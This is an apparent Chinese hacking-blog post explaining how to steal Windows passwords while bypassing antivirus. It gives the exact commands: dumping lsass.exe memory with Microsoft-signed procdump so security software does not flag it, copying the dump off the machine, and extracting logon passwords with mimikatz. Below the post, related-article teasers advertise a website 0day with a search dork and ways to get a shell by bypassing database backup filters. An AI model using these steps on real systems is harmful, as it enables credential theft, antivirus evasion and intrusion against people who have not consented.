绕过杀毒软件抓取windows密码

hacker5年前黑客文章858

 使用procdump,由于是微软的东西,带微软签名杀软不会报毒。

procdump -accepteula -ma lsass.exe lsass.dmp

copy出 lsass.dmp到本机。


mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords

具体可以参考原文:

http://blog.gentilkiwi.com/securite/mimikatz/minidump


标签: 黑客技术

相关文章

[转]N点商业版通杀0day 以及利用方法

作者:qingran 首先百度搜索关键字:inurl: (mmdatabase.asp) 我随便列举一个:   www.xxxx.com 修改链接:http://w...

另类突破数据库备份过滤拿shell

另类突破数据库备份过滤拿shell

 原创作者:泪舞   Qq:8109217   ( 转载请写上作者名 ) 苦逼的黑阔们,你是否和我一样深夜一个人在电脑前默默研究技术!...

WinDbg可用以调节核心方式运行内存转储

WinDbg可用以调节核心方式运行内存转储

什么叫WinDbg? WinDbg,像OllyDbg,是由Microsoft派发的Microsoft Windows多功能程序调试。该黑客工具可用以调节客户方式程序运行,驱动软件和电脑操作系统自身,...

Nessus 5.0 使用指南

参考官方手册 http://static.tenable.com/documentation/nessus_5.0_user_guide.pdf Nessus是世界上最流行的...

tcpdumpthetrafficonanetwo

tcpdumpthetrafficonanetwo

介绍: tcpdump全名:dump the traffic on a network,依据使用人的界定对互联网上的数据文件开展捕获的包分析工具。 tcpdump能够将互联网中传输的数据文件的“头”...

怎么教你怎么用黑客技术攻击网站  分享8个强大的黑客技术学习网站

怎么教你怎么用黑客技术攻击网站  分享8个强大的黑客技术学习网站

黑客攻击是一项很难掌握的技能,在很大的程度上要求人们对计算机和软件架构的各种概念和网络系统有深入的了解,今天,分享8个道德黑客学习可以利用的网站       黑客主要有两种:黑帽黑客、白帽...